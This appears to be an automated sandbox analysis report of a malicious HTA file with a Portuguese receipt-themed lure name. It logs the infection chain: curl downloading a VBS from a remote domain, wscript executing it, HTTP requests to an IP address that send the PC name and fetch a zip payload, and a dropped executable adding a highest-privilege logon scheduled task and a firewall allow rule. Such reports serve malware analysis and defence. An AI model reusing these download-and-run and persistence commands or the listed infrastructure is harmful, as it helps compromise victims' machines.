Windows Analysis Report
#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta

Compliance

Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49705 version: TLS 1.2

Networking

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 109.234.39.156 80

Source: C:\Windows\SysWOW64\curl.exe	Dropped file: adodbStream.Write xmlhttp.ResponseBody			Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	Dropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2			Jump to dropped file

Source: global traffic	HTTP traffic detected: GET /mod-pt28/pt2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pt/pt28.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 11:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 28 Oct 2024 13:03:12 GMTETag: "2656701-62589174e0400"Accept-Ranges: bytesContent-Length: 40199937Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 2f 7c e6 3a d8 e1 df 30 3f 7d 01 00 00 b8 02 00 09 00 00 00 75 6e 72 61 72 2e 64 6c 6c ec fd 7d 7c 54 c5 f5 38 8e df 7d 48 b2 90 25 77 81 0d ac 12 21 ca aa c1 44 0c 6c b4 81 0d 18 20 84 a8 11 77 f3 b0 8b 02 09 b6 36 4d 53 b4 16 76 03 d6 08 89 37 1b 72 33 5c c4 16 a8 7d d7 5a db aa 6f ac be 5b 6c 35 80 62 dc 4d 20 09 f2 0c 56 50 ac e2 f3 0d 0b 08 3e 40 78 dc df 39 67 ee 6e 36 01 fb e9 f7 fb fa 7c 3e bf df 1f bf c0 de 87 b9 33 67 ce 9c 39 73 e6 cc cc 99 33 77 df b7 5a 30 08 82 60 84 5f 24 22 08 9b 04 fe 97 2f fc af ff 7a e1 97 32 e6 f5 14 e1 d5 41 bb ae dd a4 2b de 75 6d 59 f5 4f 17 a7 3f bc e8 e7 3f 59 74 ff 83 e9 3f ba ff a1 87 7e ee 4b ff e1 8f d3 17 f9 1f 4a ff e9 43 e9 05 f7 94 a6 3f f8 f3 07 7e 3c 7e c8 90 c1 76 0d c6 ba ef 7a 2c fb d7 ac 98 11 fd ed ec 34 cc f8 90 ee c3 66 ec 80 fb e1 63 c6 19 0a bd 1b 67 bc 03 f7 ef 4a 2e cc 38 4c 71 9b 66 cc a7 ef 86 19 4f d3 3d 75 c6 01 8a 37 9c ee 87 8f 8d a0 7b c9 4f 7f 54 8d 70 07 e2 ee 9a 29 08 c5 ba 04 21 f4 57 e7 9d d1 b0 23 82 fe da 64 dd 20 41 c8 d1 0b 42 3d 0f 33 bd a9 13 04 0b 26 d0 e3 ab 85 9e e1 31 41 4b 63 8c 26 5e 60 a0 97 0d 4b 0d f0 39 9f 27 b2 08 42 df 5d bb b5 e8 85 87 e1 eb 73 cb f5 82 0b df d3 0d 42 8e 51 b8 fc 2f db 20 34 0f 87 5b 89 5e 48 13 be ff ef e1 9f eb fb d7 15 e0 f9 8e ee fb e3 8f f7 fd 78 a9 0f ef 0e 3d 47 08 cb 3a 20 ff 74 28 cd f8 45 0f dc ef bb 1f e0 3b b5 b2 e7 c1 3d 57 1f 1f 0d f3 cd 1f cf a3 09 75 48 af d5 f0 dd 06 77 df 65 f1 82 e3 17 2d 5e f4 23 cc ce c8 cb 2c 24 c2 7d e5 15 e0 2d fa f1 c2 9f 43 c4 61 76 4e 03 e1 06 b8 ff ea b2 78 d3 85 ff ff df ff 96 3f 56 66 37 4e 0c d6 4f 2e f1 b0 53 fe 3b 5b ee d4 d5 9f 9d e9 b7 d5 ff 52 bf cc 3f ac fe 97 86 0a bf 79 83 ae b9 e9 d9 47 04 a1 a2 dd 28 d4 9f bd df 7f 3d 7c 5c e4 1f 03 1f af f5 5f 55 ff 4b e3 d5 fe e1 f5 bf 4c 48 f2 0f c9 9d 9e e8 37 f1 b8 1b 74 18 7b 27 fc b1 86 a7 e1 9d 3d f9 14 5c 6b 04 57 89 fa d2 f3 82 d0 b1 33 f6 87 f9 2b d3 b2 5b 4c 93 07 fb ed 8d db 7d c3 5a 8a 74 93 ef d4 f9 6d 52 50 2f b5 eb 1b b7 fb 3f 73 04 1d db 03 41 71 4d a8 25 04 40 47 05 a5 43 91 f8 80 9d fd fe 58 81 dd 08 45 d1 15 1a d9 6c 23 2b 34 39 bb 6b 1d 6c 6f e8 a8 de ab d4 e9 d3 9d 7b 6a f5 ec 2c 4b 51 8c b7 bb dc ea 75 ab 74 82 b4 d5 24 27 06 82 fe c1 9b 17 be a1 b7 a8 f3 6b 05 41 5e 66 aa 8c a2 bf b3 63 e7 e5 f0 01 67 93 dc b0 c0 0b 51 9f 7c 00 ae 9d 0d 4b e1 2a b4 9b 20 09 e4 cd 12 bd 8e 88 b3 cb 97 ec 52 27 2a 98 83 51 9e 0a 30 e5 65 c6 ca 8a 8e 2b e0 97 7d 19 7e 89 5e 97 1a 50 2e 43 2e e8 1f 80 1c d1 37 db 2c 08 81 a0 2f c9 a5 6e 5d a9 13 ee 1d 80 70 4d a4 fa c8 24 bd e5 81 3f 62 65 bb a4 63 e9 a5 e5 1e ef 1f 85 df e8 2d 8e ad 2e a5 c0 9e f3 c0 9f 89 0d 4e 75 36 ad 87 2a 12 d4 f0 33 82 d0 18 14 03 53 41 8

Source: global traffic	HTTP traffic detected: GET /mod-pt28/pt2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pt/pt28.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: apps.downloadaps.com

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49705 version: TLS 1.2

System Summary

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal96.evad.winHTA@51/13@1/30

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\6720c012c76dc[1].js

Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6372
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$18e8$432c4c
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$18e4
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03

Source: C:\_6720c012c774c\BLOCKBUSTER.exe

File created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept

Source: Yara match

File source: 0000001C.00000000.1471984407.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs

Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs"
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720c012c774c\BLOCKBUSTER.exe "C:\_6720c012c774c\BLOCKBUSTER.exe"
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\_6720c012c774c\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll
